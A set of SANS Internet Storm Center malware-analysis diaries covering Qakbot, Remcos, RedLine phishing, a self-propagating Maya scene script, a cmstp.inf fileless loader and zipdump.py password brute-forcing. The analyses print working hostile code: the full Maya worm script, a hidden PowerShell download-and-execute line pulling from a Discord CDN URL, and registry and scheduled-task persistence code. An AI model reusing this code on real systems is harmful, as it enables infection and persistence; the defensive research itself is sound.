SANS

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

This week (2023-06-21) I found 2 emails attachment in quarantine that had different text with the same attachment. The first one had an Office 365 indicating the admin had setup a custom rule to block the message and could not be delivered to the recipients and what to do to fix it.

This attachment is well detected by multiple AV vendor as trojan downloader. I used AssemblyLine [1] for to analyse this zip file (9658904352011.zip) [2] and recovered a long list of indicators from the analysis. Brad [3] published a similar diary with Modiloader last month.

AssemblyLine classifies the indicators as informative, suspicious, malicious during the analysis. 

Emerging Threat Signature

ET MALWARE FormBook CnC Checkin (GET)

Indicators of Compromised - Malicious

atlas-management.tech
94.73.149.144

Indicators of Compromised - Suspicious

www.7523615.com
www.espiaocelular.foundation
www.harrisonfanilyvets.co.uk
www.realt39.ru
www.ufalive.ru
45.33.2.79
45.79.19.196
96.126.123.244
209.197.3.8

SHA256 Hashes

38b0084c5d02a04696027b5f58eaf6f528af5ba303f67f8cdf2d193a267beda8
fe9f53f107e573b8ab26e52e4f894d5f157b57e81a828ff4e530c3741c0006d5

SSDEEP

24:hYIJAC8kMxMg8p0MlgAtHQTVC94yXzeUt2:OPxMvpflmVC946aUc
12288:mJJqvi0qOhfCAUBBzjjSphHrqFDq++ByPcwie8EWnLI4jREohPXYKC:mJshqECZ3njSnHrqFgwdePL/VE8fDC

[1] https://isc.sans.edu/diary/Assemblyline+as+a+Malware+Analysis+Sandbox/29510
[2] https://www.virustotal.com/gui/file/38b0084c5d02a04696027b5f58eaf6f528af5ba303f67f8cdf2d193a267beda8
[3] https://isc.sans.edu/diary/Malspam+pushes+ModiLoader+DBatLoader+infection+for+Remcos+RAT/29896
[4] https://community.emergingthreats.net/
[5] https://tria.ge/s/family:modiloader

-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

It has been a while since I spotted such kind of document. Yesterday, I found a Word document (SHA256:5070e8a3fdaf3027170ade066eaf7f8e384c1cd25ce58af9155627975f97d156)[1] behaving like a dropper.

The document in itself is itself was pretty basic. It just displayed a basic capture of an Excel dialog box:

But, once loaded, a brief pop-up window is displayed, mentioning an HTTP request to an external website. The document does not contain any VBA macro, no payload, and no exploits.

Here is the magic used by the attacker. He used a Word template. Microsoft Word has a feature that helps the user to create a document with a template. The template will be opened and applied to the original document when the document is opened. The magic is here: In Microsoft Windows, everything can be loaded from a “local” location (the filesystem) but also from an “online” place (read: the Internet).

To manage the templates, you need to activate the "Developer" menu in Word (via the options panel), and a new window will be available:

This document uses a template stored on a remote web server. How to verify this? In the OOXML file “./word/_rels/settings.xml.rels”, you can spot this:

<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"> <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" \ Target="hxxps://reducereducereducereducereducereducereducereducereducereducereducereducereduce@reduced[.]to/kxey0" \ TargetMode="External"/> </Relationships>

Note that the attacker uses basic authentication to restrict access to the document. Unfortunately, the URL has already been cleaned, but with some OSINT, I could find the template used here.

The file (with SHA256:a7056b7ae82c04e4ff2e674ddf76d08ac7e89baa4d18bc17059eaba9c522cb3d)[2] is an RTF file, and those files usually contain an exploit or malicious payload. And this one tries to exploit the good old equation editor (again and again) to drop a Remcos RAT (SHA256:9d6ead1f911aa56ad0d3bb44131f22f0064d7c553c86d1d518d35247af49d488)[3]. Here is the extraction config related to the campaign:

{   "c2": [ "89[.]37[.]99[.]49:5888" ], "attr": { "mutex": "Rmc-LESPRM", "copy_file": "remcos.exe", "hide_file": false, "copy_folder": "Remcos", "delete_file": false, "keylog_file": "logs.dat", "keylog_flag": false, "audio_folder": "MicRecords", "install_flag": false, "keylog_crypt": false, "mouse_option": false, "connect_delay": "0", "keylog_folder": "remcos", "screenshot_flag": false, "screenshot_path": "%AppData%", "screenshot_time": "10", "connect_interval": "1", "hide_keylog_file": false, "screenshot_crypt": false, "audio_record_time": "5", "screenshot_folder": "Screenshots", "take_screenshot_time": "5", "take_screenshot_option": false }, "rule": "Remcos", "botnet": "RemoteHost", "family": "remcos" }

I like to call this technique a “Matryoshka Document” (or Russian dolls) because a document is dropped by the first one, then another one, etc.

[1] https://www.virustotal.com/gui/file/5070e8a3fdaf3027170ade066eaf7f8e384c1cd25ce58af9155627975f97d156/telemetry
[2] https://www.virustotal.com/gui/file/a7056b7ae82c04e4ff2e674ddf76d08ac7e89baa4d18bc17059eaba9c522cb3d
[3] https://www.virustotal.com/gui/file/9d6ead1f911aa56ad0d3bb44131f22f0064d7c553c86d1d518d35247af49d488

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Introduction

Qakbot using the obama-series distribution tag has been active this week on Tuesday 2023-06-20 (obama269), Wednesday 2023-06-21 (obama270), and Thursday 2023-06-22 (obama271). Today's diary provides indicators from an infection and some samples collected today from the obama271 wave on Thursday 2023-06-22.

Shown above:  Flow chart for today's obama271 Qakbot infection.

Initial Infection Traffic

The initial infection started with an HTTP URL ending in .gif that returned a zip archive.  After extracting a .js file from the downloaded zip and running it, we see HTTPS traffic with the domain that returned our Qakbot DLL.  Qakbot C2 traffic includes HTTPS requests to legitimate domains like oracle.com as noted below.  Finally, we saw Qakbot HTTPS C2 traffic on 142.154.58[.]207 almost eight minutes after the Qakbot DLL was retrieved.

Shown above:  Traffic from the infection filtered in Wireshark.

Indicators of compromise (IOCs)

2023-06-22 (THURSDAY): OBAMA271 QAKBOT (QBOT) ACTIVITY

INFECTION CHAIN:

email --> PDF attachment --> link from PDF --> downloaded zip --> extracted .js --> retrieves/runs Qakbot DLL

SIX EXAMPLES OF PDF ATTACHMENTS:

272ce466b3a6170c010806f207e3f69cb732c6d56d219e48c24f954378a044fb  BSN-1123674130.pdf
06f3fc2a37fcc5785fcf482ff01f83e461be4ad55aa20abbbc6dbf3239a1eabd  BSN-1606206602.pdf
c95a5ce6a5826df5ac6589a87faf3c67ff42f44dd4474c27a3eac13580329423  BSN-2057567741.pdf
dc8150390742b6d5c7a1c2d8c1f7291181382f1fa03dccb6cabd7e669e28640d  BSN-235750987.pdf
622b1ca18203ea6203845df514442370f547bfd5fa9ca3efd8b947ad37ad37ef  BSN-689895792.pdf
e032d480889727fb3fa5632084b4ce846b9a25fb855d1897977d0e155a472e2b  BSN-773800054.pdf

LINKS FROM ATTACHED PDF FILES:

hxxps://brotherocean[.]com/bebarwlxbs/bebarwlxbs.gif
hxxp://garagedoorportsmouthnh[.]com/xnozmxusda/xnozmxusda.gif
hxxps://janakagroup[.]lk/dfvurstvvb/dfvurstvvb.gif
hxxp://pn-jayapura[.]go[.]id/rwhdnuavuo/rwhdnuavuo.gif
hxxp://rolopom[.]com/alfqtwrbcn/alfqtwrbcn.gif
hxxp://treegeyecare[.]com/ypsormkzyz/ypsormkzyz.gif

FILES USED FOR AN INFECTION RUN:

SHA256 hash: d32e1cc5c161ae0fd8ae6c11cb6df5bce79690d1c533b4a5b9140ed8cb005f21

File size: 79,478 bytes
Downloaded from: hxxp://rolopom[.]com/alfqtwrbcn/alfqtwrbcn.gif
File name: BSN-1226578580.zip
File description: Zip archive downloaded from link in PDF attachment

SHA256 hash: c465f039b08c3320fdce5f63992b5363b96c21d6e3b1da1df1e38caf65482caa

File size: 350,611 bytes
File name: BSN-1226578580.js
File description: JS file extracted from the above zip archive

URLS GENERATED BY THE ABOVE .JS FOR QAKBOT DLL:

hxxp://hevintar[.]com/0.38107541532568295.dat
hxxp://cehazik[.]com/0.8841605299322328.dat
hxxp://cosiruk[.]com/0.2959007454371704.dat
hxxp://swofacin[.]com/0.6385317941125832.dat
hxxp://tytrhel[.]com/0.8364758034624875.dat
hxxp://cgpersa[.]com/0.9934429799425988.dat

QAKBOT DLL SEEN DURING THE INFECTION RUN:

SHA256 hash: 98bf24844d138dfd50188f3325f13ea3a1cde4d650900ae1d6820a2b1d4a59fd

File size: 1,405,439 bytes
Downloaded from: hxxp://hevintar[.]com/0.38107541532568295.dat
File location: C:\VPNStors\Krosters\Spote.OCCXX
Run method: rundll32.exe [file name],zertc

Final Words

A pcap of the infection traffic, along the the associated malware and artifacts can be found here.

---
Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Apple released iOS, macOS, and watchOS updates, patching three vulnerabilities already being exploited. Two vulnerabilities affect WebKit, leading to a Safari patch for older operating systems.
The two WebKit issues (CVE-2023-32439 and CVE-2023-32435) can be used to execute arbitrary code as a user visits a malicious web page. The third vulnerability, CVE-2023-32434, can be used to elevate privileges after the initial code execution. 
See below for affected operating systems. Apple does not provide CVSS scores, so we asked ChatGPT to fill them in.

Safari 16.5.1 iOS 16.5.1 and iPadOS 16.5.1 iOS 15.7.7 and iPadOS 15.7.7 macOS Ventura 13.4.1 macOS Monterey 12.6.7 macOS Big Sur 11.7.8 watchOS 9.5.2 watchOS 8.8.1 CVE-2023-32439 [critical] ChatGPT-CVSS: CVSS score: 9.8 (Critical) *** EXPLOITED *** WebKit
A type confusion issue was addressed with improved checks.
Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. x x x x         CVE-2023-32434 [important] ChatGPT-CVSS: 8.8 *** EXPLOITED *** Kernel
An integer overflow was addressed with improved input validation.
An app may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7.   x x x x x x x CVE-2023-32435 [critical] ChatGPT-CVSS: 7.8 *** EXPLOITED *** WebKit
A memory corruption issue was addressed with improved state management.
Processing web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7.     x          

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

One of our Stormcast listeners, Kevin, wrote in to share that his friend Jon had received a direct spear-phishing e-mail. We requested for more information, and Jon kindly provided us with the corresponding e-mails and data to analyze. The spear-phishing e-mail sent to Jon masqueraded as an individual representing NordVPN (note: NordVPN had published an advisory about scammers posing as NordVPN representatives earlier this year [1]) and enquired about the possibility of a YouTube sponsorship/collaboration with his YouTube channel. I took the liberty to examine the phishing e-mail and its associated artifacts, noting the details I observed from my analysis.

I first examined the e-mail headers, noting the observation of the mail.ru header in the X-Mailer field. (with reference to Figure 1). The e-mail address that the adversary used was collaboration@nordvpn-media[.]com, which had a very close domain name to the original domain name (nordvpnmedia[.]com) that NordVPN had stated to be genuine [1].

Figure 1: Screenshot of E-Mail Headers

I went through the content of the e-mail, and it revolved around discussing the purported sponsorship details. However, another small titbit caught my eye (with reference to Figure 2).

Figure 2: Russian Characters Within E-Mail Thread

I noticed the presence of Russian characters within the e-mail thread. The Russian characters (highlighted within the red box) translate to “Monday, 19 June 2023”, and an UTC offset of +3 was observed. A quick search for the time zones used in Russia indicates that UTC +3 is currently being used for Moscow.

I turned my attention to the domain nordvpn-media[.]com and wondered who had registered the domain. After checking the Whois records, it appeared that the site was hosted in Russia and registered since March 5th, 2023 (Figure 3). However, the hosting provider seemed to have blocked the page. Unfortunately, a little journey to the Wayback Machine did not yield any decent results either.

Figure 3: Domain Details of nordvpn-media.com

There was a pdf file titled “NordVPN® Media-Kit for YT Partners.pdf”. I wondered if there were any malicious files embedded within it and proceeded to perform some PDF file analysis. I first used exiftool to gather some basic metadata of the attached PDF file (Figure 4). It was interesting to observe that though Figure 2 had a UTC offset of +3, Figure 4 showed that the modification date of the file had a UTC offset of +2.

Figure 4: Output of Metadata after Executing Exiftool

Our SANS ISC Handler, Didier Stevens, has published many excellent tools [2]. I took the opportunity to use one of the tools he created, pdfid.py, to investigate if the PDF file was malicious. With reference to Figure 5, the file appeared to be harmless.

Figure 5: Output of pdfid.py

I proceeded to investigate the attached PDF file, and Figure 6 shows the content of the rendered PDF file. I briefly investigated the name used in the top left of the PDF file. While the name was associated with a few reviews of NordVPN submitted online, the picture that was used was lifted off the first Google result of the utilized name. There was also a Download button within the PDF file and hyperlinked to a Dropbox link (hxxps://www[.]dropbox[.]com/s/4b9cqh7oxlq4g0t/NordVPN®%20Promotional%20Materials%20June%202023[.]rar?dl=1).

Figure 6: Screenshot of Attached PDF File in the E-mail

Clicking on the link would immediately trigger a download of the compressed RAR archive. Unpacking the RAR file (with the password shown in the PDF) would yield 3 files, as shown in Figure 7.

Figure 7: Output of the RAR Archive

Of the 3 files, only the .exe file appeared suspicious. The other 2 files (.txt and .mp4) had previously been uploaded to VirusTotal. I performed brief static and dynamic analysis of the .exe file, and obtained a few interesting observations. For example, I found a reference to a .pdb file named plan4cvartal2otchet.pdb (possibly Russian, given the earlier observations). The executable also had an imphash of f34d5f2d4577ed6d9ceec516c1f5a744, and I found at least one other similar piece of malware that was uploaded on June 10, 2023 (albeit with a different hash) [3]. The following information was also extracted:

{
"c2": [
"176.113.115.23:27556"
],
"attr": {
"auth_value": "9d33ed88bc78fe9fbb90806afbd547df"
},
"rule": "RedLine",
"botnet": "kek18",
"family": "redline"
}

A quick literature review online yielded several references to the RedLine Stealer, which was often transacted in underground forums [4]. This malware is capable of exfiltrating a variety of data such as saved passwords, credit card data, computer and username configuration, and even stealing cryptocurrency. [4] Although this incident may be isolated, it demonstrates the possibility of a potential campaign towards unsuspecting content creators who genuinely want to have fruitful collaborations with global brands on popular platforms such YouTube, Instagram and TikTok. With the ability to purchase malware as a subscription or as a standalone product via underground means [4], the complexity of pulling off similar cyber heists has been greatly reduced for current and budding cybercriminal groups. Constant vigilance when receiving unsolicited e-mail is vital, no matter how tempting a collaboration offer appears to be.

Indicators of Compromise (IoCs):
%%ip:45.130.41.17%%
nordvpn-media[.]com
collaboration@nordvpn-media[.]com
hxxps://www[.]dropbox[.]com/s/4b9cqh7oxlq4g0t/NordVPN®%20Promotional%20Materials%20June%202023[.]rar?dl=1
a6f54e972c40ac38a958c3ee10343e49992ad1d6 (SHA1 hash of NordVPN® Media-Kit for YT Partners.pdf)
612cf3ed13976c7b20d4ae1a7832105ac1982a6e (SHA1 Hash of NordVPN® Promotional Materials June 2023.rar)
c8c73d8a25872d0c5300cea264f92abe3993feee (NORDVPN® MEDIA KIT FOR YT PARTNERS JUNE 2023.exe)
%%ip:176.113.115.23%% (C2)

References:
1. https://nordvpn.com/blog/nordvpn-creators-scam/
2. https://blog.didierstevens.com/my-software/
3. https://www.virustotal.com/gui/file/12ab0f4389fb376011431b9ffc35cd90447edc980b75574b6b376ef0fd50fd59/details
4. https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

-----------
Yee Ching Tok, Ph.D., ISC Handler
Personal Site
Mastodon
Twitter

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

My Python hunting rules reported some interesting/suspicious files. The files are named with a “.ma” extension. Some of them have very low VT scores. For example, the one with a SHA256 dc16115d165a8692e6f3186afd28694ddf2efe7fd3e673bd90690f2ae7d59136 has a score of 15/59.

The “.ma” extension refers to animation projects created by Autodesk Maya, a 3D modeling and animation program[1]. The files are typically ASCI files that describe the 3D scenes. I’ve absolutely, zero-knowledge of 3D software but after some Google searches, it seems that Maya supports Python![2]. Like the documentation says:

“Python scripting can be used for many tasks in Maya, from running simple commands to developing plug-ins, and several different Maya-related libraries are available targeting different tasks.”

What could go wrong? If attackers (ab)use VBA macros in Microsoft Office, why not (ab)use Python in Maya? I found a reference to this type of malware back in 2020 when people discovered some “strange behaviors” in .ma files.

Here is a piece of script linked to a “createNode” action:

createNode script -n "vaccine_gene"; rename -uid "9AA7A497-4607-1F0C-931D-E6ABE655FB34"; addAttr -ci true -sn "nts" -ln "notes" -dt "string"; setAttr ".b" -type "string" "petri_dish_path = cmds.internalVar(userAppDir=True) + 'scripts/userSetup.py'\npetri_dish_gene = ['import sys\\r\\n', 'import maya.cmds as cmds\\r\\n', \"maya_path = cmds.internalVar(userAppDir=True) + '/scripts'\\r\\n\", 'if maya_path not in sys.path:\\r\\n', ' sys.path.append(maya_path)\\r\\n', 'import vaccine\\r\\n', \"cmds.evalDeferred('leukocyte = vaccine.phage()')\\r\\n\", \"cmds.evalDeferred('leukocyte.occupation()')\"]\nwith open(petri_dish_path, \"w\") as f:\n\tf.writelines(petri_dish_gene)"; setAttr ".st" 1; setAttr ".stp" 1; setAttr ".nts" -type "string" ( "['# coding=utf-8\\r\\n', '# @Time : 2020/07/05 15:46\\r\\n', '# @Author : \\xe9\\xa1\\xb6\\xe5\\xa4\\xa9\\xe7\\xab\\x8b\\xe5\\x9c\\xb0\\xe6\\x99\\xba\\xe6\\x85\\xa7\\xe5\\xa4\\xa7\\xe5\\xb0\\x86\\xe5\\x86\\x9b\\r\\n', '# @File : vaccine.py\\r\\n', '# \\xe4\\xbb\\x85\\xe4\\xbd\\x9c\\xe4\\xb8\\xba\\xe5\\x85\\xac\\xe5\\x8f\\xb8\\xe5\\x86\\x85\\xe9\\x83\\xa8\\xe4\\xbd\\xbf\\xe7\\x94\\xa8\\xe4\\xbf\\x9d\\xe6\\x8a\\xa4 \\xe4\\xb8\\x80\\xe6\\x97\\xa6\\xe6\\xb3\\x84\\xe9\\x9c\\xb2\\xe5\\x87\\xba\\xe5\\x8e\\xbb\\xe9\\x80\\xa0\\xe6\\x88\\x90\\xe7\\x9a\\x84\\xe5\\xbd\\xb1\\xe5\\x93\\x8d \\xe6\\x9c\\xac\\xe4\\xba\\xba\\xe6\\xa6\\x82\\xe4\\xb8\\x8d\\xe8\\xb4\\x9f\\xe8\\xb4\\xa3\\r\\n', 'import maya.cmds as cmds\\r\\n', 'import os\\r\\n', 'import shutil\\r\\n', '\\r\\n', '\\r\\n', 'class phage:\\r\\n', ' @staticmethod\\r\\n', ' def backup(path):\\r\\n', \" folder_path = path.rsplit('/', 1)[0]\\r\\n\", \" file_name = path.rsplit('/', 1)[-1].rsplit('.', 1)[0]\\r\\n\", \" backup_folder = folder_path + '/history'\\r\\n\", \" new_file = backup_folder + '/' + file_name + '_backup.ma '\\r\\n\", ' if not os.path.exists(backup_folder):\\r\\n', ' os.makedirs(backup_folder)\\r\\n', ' shutil.copyfile(path, new_file)\\r\\n', '\\r\\n', ' def antivirus(self):\\r\\n', ' health = True\\r\\n', ' self.clone_gene()\\r\\n', ' self.antivirus_virus_base()\\r\\n', \" virus_gene = ['sysytenasdasdfsadfsdaf_dsfsdfaasd', 'PuTianTongQing', 'daxunhuan']\\r\\n\", ' all_script_jobs = cmds.scriptJob(listJobs=True)\\r\\n', ' for each_job in all_script_jobs:\\r\\n', ' for each_gene in virus_gene:\\r\\n', ' if each_gene in each_job:\\r\\n', ' health = False\\r\\n', \" job_num = int(each_job.split(':', 1)[0])\\r\\n\", ' cmds.scriptJob(kill=job_num, force=True)\\r\\n', \" all_script = cmds.ls(type='script')\\r\\n\", ' if all_script:\\r\\n', ' for each_script in all_script:\\r\\n', \" commecnt = cmds.getAttr(each_script + '.before')\\r\\n\", ' for each_gene in virus_gene:\\r\\n', ' if commecnt:\\r\\n', ' if each_gene in commecnt:\\r\\n', ' try:\\r\\n', ' cmds.delete(each_script)\\r\\n', ' except:\\r\\n', \" name_space = each_script.rsplit(':',1)[0]\\r\\n\", \" cmds.error(u'{}\\xe8\\xa2\\xab\\xe6\\x84\\x9f\\xe6\\x9f\\x93\\xe4\\xba\\x86\\xef\\xbc\\x8c\\xe4\\xbd\\x86\\xe6\\x98\\xaf\\xe6\\x88\\x91\\xe6\\xb2\\xa1\\xe6\\xb3\\x95\\xe5\\x88\\xa0\\xe9\\x99\\xa4'.format(name_space))\\r\\n\", ' if not health:\\r\\n', ' file_path = cmds.file(query=True, sceneName=True)\\r\\n', ' self.backup(file_path)\\r\\n', ' cmds.file(save=True)\\r\\n', \" cmds.error(u'\\xe4\\xbd\\xa0\\xe7\\x9a\\x84\\xe6\\x96\\x87\\xe4\\xbb\\xb6\\xe8\\xa2\\xab\\xe6\\x84\\x9f\\xe6\\x9f\\x93\\xe4\\xba\\x86\\xef\\xbc\\x8c\\xe4\\xbd\\x86\\xe6\\x98\\xaf\\xe6\\x88\\x91\\xe8\\xb4\\xb4\\xe5\\xbf\\x83\\xe7\\x9a\\x84\\xe4\\xb8\\xba\\xe6\\x82\\xa8\\xe6\\x9d\\x80\\xe6\\xaf\\x92\\xe5\\xb9\\xb6\\xe4\\xb8\\x94\\xe5\\xa4\\x87\\xe4\\xbb\\xbd\\xe4\\xba\\x86~\\xe4\\xb8\\x8d\\xe7\\x94\\xa8\\xe8\\xb0\\xa2~')\\r\\n\", ' else:\\r\\n', \" cmds.warning(u'\\xe4\\xbd\\xa0\\xe7\\x9a\\x84\\xe6\\x96\\x87\\xe4\\xbb\\xb6\\xe8\\xb4\\xbc\\xe5\\x81\\xa5\\xe5\\xba\\xb7~\\xe6\\x88\\x91\\xe5\\xb0\\xb1\\xe8\\xaf\\xb4\\xe4\\xb8\\x80\\xe5\\xa3\\xb0\\xe6\\xb2\\xa1\\xe6\\x9c\\x89\\xe5\\x88\\xab\\xe7\\x9a\\x84\\xe6\\x84\\x8f\\xe6\\x80\\x9d')\\r\\n\", '\\r\\n', ' @staticmethod\\r\\n', ' def antivirus_virus_base():\\r\\n', \" virus_base = cmds.internalVar(userAppDir=True) + '/scripts/userSetup.mel'\\r\\n\", ' if os.path.exists(virus_base):\\r\\n', ' try:\\r\\n', ' os.remove(virus_base)\\r\\n', ' except:\\r\\n', \" cmds.error(u'\\xe6\\x9d\\x80\\xe6\\xaf\\x92\\xe5\\xa4\\xb1\\xe8\\xb4\\xa5')\\r\\n\", '\\r\\n', ' def clone_gene(self):\\r\\n', \" vaccine_path = cmds.internalVar(userAppDir=True) + '/scripts/vaccine.py'\\r\\n\", \" if not cmds.objExists('vaccine_gene'):\\r\\n\", ' if os.path.exists(vaccine_path):\\r\\n', ' gene = list()\\r\\n', ' with open(vaccine_path, \"r\") as f:\\r\\n', ' for line in f.readlines():\\r\\n', ' gene.append(line)\\r\\n', ' cmds.scriptNode(st=1,\\r\\n', ' bs=\"petri_dish_path = cmds.internalVar(userAppDir=True) + \\'scripts/userSetup.py\\'\\\\npetri_dish_gene = [\\'import sys\\\\\\\\r\\\\\\\\n\\', \\'import maya.cmds as cmds\\\\\\\\r\\\\\\\\n\\', \\\\\"maya_path = cmds.internalVar(userAppDir=True) + \\'/scripts\\'\\\\\\\\r\\\\\\\\n\\\\\", \\'if maya_path not in sys.path:\\\\\\\\r\\\\\\\\n\\', \\' sys.path.append(maya_path)\\\\\\\\r\\\\\\\\n\\', \\'import vaccine\\\\\\\\r\\\\\\\\n\\', \\\\\"cmds.evalDeferred(\\'leukocyte = vaccine.phage()\\')\\\\\\\\r\\\\\\\\n\\\\\", \\\\\"cmds.evalDeferred(\\'leukocyte.occupation()\\')\\\\\"]\\\\nwith open(petri_dish_path, \\\\\"w\\\\\") as f:\\\\n\\\\tf.writelines(petri_dish_gene)\",\\r\\n', \" n='vaccine_gene', stp='python')\\r\\n\", ' cmds.addAttr(\\'vaccine_gene\\', ln=\"notes\", sn=\"nts\", dt=\"string\")\\r\\n', \" cmds.setAttr('vaccine_gene.notes', gene, type='string')\\r\\n\", \" if not cmds.objExists('breed_gene'):\\r\\n\", ' cmds.scriptNode(st=1,\\r\\n', ' bs=\"import os\\\\nvaccine_path = cmds.internalVar(userAppDir=True) + \\'/scripts/vaccine.py\\'\\\\nif not os.path.exists(vaccine_path):\\\\n\\\\tif cmds.objExists(\\'vaccine_gene\\'):\\\\n\\\\t\\\\tgene = eval(cmds.getAttr(\\'vaccine_gene.notes\\'))\\\\n\\\\t\\\\twith open(vaccine_path, \\\\\"w\\\\\") as f:\\\\n\\\\t\\\\t\\\\tf.writelines(gene)\",\\r\\n', \" n='breed_gene', stp='python')\\r\\n\", '\\r\\n', ' def occupation(self):\\r\\n', ' cmds.scriptJob(event=[\"SceneSaved\", \"leukocyte.antivirus()\"], protected=True)\\r\\n']");

The script is not easy to understand due to the huge amount of escaped characters, but it modifies the file "userScript.py" (located in $MAYA_APP_DIR/<version>/scripts). This file is used to set up the environment at startup time. Think about the ".bashrc" for Bash shells.

After more Googling, I found a reference to the same kind of script[3]. In the script above, I found some hex-encoded Chinese text:

• “Infected, but I can't remove it”
• “Your file is infected, but I thoughtfully disinfected it for you and backed it up, thank you”
• “Your file is considered unhealthy, I just say it has no other meaning”

Conclusion: Thanks to modern software with extended script capabilities, executable code can be anywhere!

[1] https://www.autodesk.com/products/maya/overview
[2] https://help.autodesk.com/view/MAYAUL/2020/ENU/?guid=GUID-C0F27A50-3DD6-454C-A4D1-9E3C44B3C990
[3] https://gist.github.com/mottosso/5d4f43a778e9b95d6dcd6a41bb7ae609

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Microsoft has used “.inf” files for a while[1]. They are simple text files and contain setup information in a driver package. They describe what must be performed to install a driver package on a device. When you read them, the syntax is straightforward to understand. The file is based on sections that describe what must be performed. One of them is very interesting for attackers: [RunPreSetupCommandsSection]. Note that .inf files cannot be executed “as is”.

The malicious file I found has the following section:

[RunPreSetupCommandsSection] ; Commands Here will be run Before Setup Begins to install C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hiDden iex ((New-Object System.Net.WebClient).DownloadString('hxxps://cdn[.]discordapp[.]com/attachments/1114670648028049408/1119347463023759521/task.ps1')) taskkill /IM CMsTp.exe /F

The payload ‘task.ps1’ contains the following code:

$webContent = Invoke-WebRequest -Uri "hxxps://cdn[.]discordapp[.]com/attachments/1114670648028049408/1119333871213879356/get.txt" New-Item -Path "HKCU:\Software\lath3"; Set-ItemProperty -Path "HKCU:\Software\lath3" -Name "lath2" -Force -Value $webContent.Content; $action = New-ScheduledTaskAction -Execute 'powershell.exe' -Argument '-w hiDden $you=[Convert]::FromBase64String((gp "HKCU:\Software\lath3").lath2);[Reflection.Assembly]::Load($you);[QJAMsrpfhk.HH]::Main()' $trigger = New-ScheduledTaskTrigger -AtStartup Register-ScheduledTask -Action $action -RunLevel Highest Force -Trigger $trigger -TaskName "Demo" -Description "Shane"

The payload ‘get.txt’ contains a Base64-encoded executable that will be decoded and loaded by Powershell. It’s a DLL with a VT score of 31/70 (SHA256:15b97c5182a30d4c85b31835b44d978dc065892587a7656038575bd32a62ac32).

The PowerShell script can be categorized as "fileless" because it saves the payload in a registry key (HKCU:\Software\lath3\lath2) and creates a scheduled task to implement persistence. The PowerShell script will be launched every time the compromised host reboots. 

They are interesting information in the .inf file:

[Strings] ServiceName="CorpVPN" ShortSvcName="CorpVPN"

The file is called 'cmstp.inf'. cmstp.exe is a LOLbin, provided by Microsoft tool for managing Connection Provider service profiles[2]. It can handle .inf files like this:

cmstp.exe [/nf] [/s] [/u] [drive:][path]serviceprofilefilename.inf

Here is the parent PowerShell script named uas32.ps1 (SHA256:20295311db1228935ddbba18678c88db78b4fc7efb54d2853cfb801851de0e19). It is obfuscated with a classic technique:

(NEw-Object MAnaGEMENt.auToMAtiON.psCreDENTIaL ' ', ( ' ... <payload> ... ' |coNVertTO-SEcUrEStrinG -ke (13..28))).GETNetwOrkCrEDentIal().PAsSWORD |Iex

I don't cover the complete script because it's not relevant. The interesting part is the following:

. Set-INFFile #Needs Windows forms add-type -AssemblyName System.Windows.Forms If (Test-Path $InfFileLocation) { #Command to run $ps = new-object system.diagnostics.processstartinfo "c:\windows\system32\cmstp.exe" $ps.Arguments = "/au $InfFileLocation" $ps.UseShellExecute = $false

The initial script will dump the file 'cmstp.inf' on disk and invoke cmstp.exe as described above. It is delivered to the victim in a CAB file (SHA256:fb4f92adc2a9c920ce9a77d1f66050c69728d1f3773c02f9da42e7809fb10d1c)

To resume, we have this flow of infection:

CAB file -> uas32.ps1 -> cmstp.exe with cmstp.inf -> Scheduled task -> Malicious DLL

[1] https://learn.microsoft.com/en-us/windows-hardware/drivers/install/overview-of-inf-files
[2] https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Gebhard's diary entry "Brute Forcing Simple Archive Passwords" inspired me to make an update to my zipdump.py tool to add brute-force password cracking.

Years ago, I added dictionary password cracking to zipdump.py (a tool to analyze ZIP files).

Hence adding a brute-force attack mode would be simple.

One can start a zipdump dictionary attack with options -P (passwordfile) or --passwordfilestop. You give it a text file with passwords to try (like rockyou), or you use file name ".", and then it uses a small builtin list (that's John-the-Ripper public domain password list).

Now, with the latest version, you can start brute-force attack mode with the following special filename: #b#.

This starts a brute-force attack, with password guesses from 1 to 3 characters long, and characters selected from these sets of characters: uppercase and lowercase ASCII letters, digits, all punctuation characters (Python's definition) and space character.

When I run this on Gebhard's sample, the password is not recovered:

The brute-force attack ran almost at 25.000 password guesses per second on the laptop I tested this on.

Now let's change some parameters. Gebhard found that the password is 4 characters long, and consisted of uppercase letters and digits.

